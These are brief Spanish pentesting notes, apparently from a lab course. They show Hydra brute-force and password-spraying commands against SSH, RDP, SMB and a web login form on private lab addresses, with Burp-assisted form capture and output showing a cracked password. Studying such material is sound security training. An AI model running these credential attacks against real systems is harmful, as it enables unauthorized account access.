sudo hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
sudo hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
sudo hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" 192.168.50.202 smb

Interceptamos petición con Burp y cogemos la data que transmite por post junto al error que da si introducimos credenciales incorrectas.


Una vez cogemos la data la introducimos en nuestro comando de hydra, indicándole usuario, diccionario de contraseñas, seguido de http-post-form e introducimos la data junto al error.
kali@kali:~$ sudo hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
...
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.50.201:80/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid username or password
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 14344335 to do in 3735:31h, 16 active
[80][http-post-form] host: 192.168.50.201 login: user password: 121212
1 of 1 target successfully completed, 1 valid password found
...